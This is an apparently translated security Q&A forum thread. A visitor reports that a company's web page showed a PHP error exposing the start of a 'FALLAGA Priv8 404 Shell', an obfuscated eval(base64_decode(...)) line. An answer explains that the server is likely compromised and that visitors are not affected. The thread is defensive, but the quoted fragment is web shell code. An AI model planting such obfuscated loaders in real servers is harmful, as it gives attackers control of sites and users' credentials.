Errato errore PHP riferito a Fallaga Priv8 404 Shell quando si visita un sito Web

2

Ho visitato un sito web (di proprietà di una grande azienda nel nord Europa) ieri. Una delle loro pagine nella sezione "chi siamo" mi ha dato un lungo errore con un messaggio iniziato con

<?PhP
/* FALLAGA Priv8 404 Shell V 1.11 */
/* Made y Black cat */
EVaL(BAsE64_DEcODe(’Ci8qICAgICAgCuKUj+KUgeKUk+KUj+KUgeKUk+KVi+KVi+KVi+KVi+KUj+KUk+KUj+KUk+KVi+KUj+KUk+KVi+KVi+KVi+KVi+KVi+KUj+KUkwrilIPilIPilJfilJvilIPilIPilYvilYvilYvilYvilIPilIPilIPilIPilYvilIPilIPilYvilYvilYvilYvilYvilIPilIMK4pSD4pSP4pST4pSP4pST4pSj4pSB4pSB4pSz4pSB4pSb4pSD4pSD4pSX4pSB4pSb4pSj4pSB4pSB4pSz4pSB4pSB4pSr4pSD4pSP4pSB4pSB4pSz4pSB4pSTCuKUg+KUg+KUg+KUg+KUg+KUg+KUj+KUk+KUg+KUj+KUk+KUg+KUg+KUj+KUgeKUk+KUg+KUj+KUk+KUg+KUj+KUgeKUq+KUg+KUg+KUg+KUgeKUq+KUj

La lunghezza totale della parte dall'aspetto intransigente era di circa 126kb (o comunque è la dimensione del file ASCII in cui l'ho salvata).

Ho riferito questo alla compagnia e mi hanno detto che daranno un'occhiata a questo.

Dal punto di vista del cliente, questo tipo di cose mi sembra un malware incorporato nella shell inversa che in qualche modo non è riuscito a eseguire correttamente.

La domanda che volevo porre riguarda se dovrei preoccuparmi che il mio sistema venga violato.

Domanda:

Questo tipo di messaggio è successo solo sul server o potrebbe indicare che il mio browser o il mio sistema operativo sono stati compromessi?

La schermata dell'errore è sotto. Ho evidenziato la parte copiata sopra.

    
posta Ronnie 15.03.2018 - 03:44
fonte

1 risposta

6

Questo è davvero il codice per una shell inversa. Il server è molto probabilmente compromesso.

Le shell Web non intendono danneggiare i visitatori, quindi né il tuo browser né il tuo sistema operativo sono stati violati. Inoltre, sembra che non sia stato caricato correttamente.

Se hai un account sul sito, non accedere fino a quando la società ti dice che l'hanno riparato, poiché l'utente malintenzionato potrebbe prendere le tue credenziali.

Se hai usato la stessa password altrove, dovresti cambiarla sugli altri siti in questo momento.

    
risposta data 15.03.2018 - 09:45
fonte

Leggi altre domande sui tag